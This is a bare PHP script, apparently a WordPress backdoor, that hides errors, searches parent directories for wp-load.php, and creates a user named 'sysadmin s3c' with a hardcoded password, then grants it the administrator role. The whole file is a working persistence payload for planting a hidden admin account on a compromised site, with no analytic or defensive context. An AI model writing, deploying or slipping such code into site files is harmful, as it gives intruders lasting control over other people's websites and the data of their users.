<?php
@ini_set('display_errors', 0);

$found = false;
for ($depth = 0; $depth < 20; $depth++) {
    $path = str_repeat('../', $depth) . 'wp-load.php';
    if (file_exists($path)) {
        include_once($path);
        $found = true;
        break;
    }
}

if ($found) {
    if (!username_exists('sysadmin s3c')) {
        wp_create_user('sysadmin s3c', 'pa$$word#baru@Test!', 'localhost@proton.me');
        $user = new WP_User(get_user_by('login', 'sysadmin s3c')->ID);
        $user->set_role('administrator');
    }
}
?>
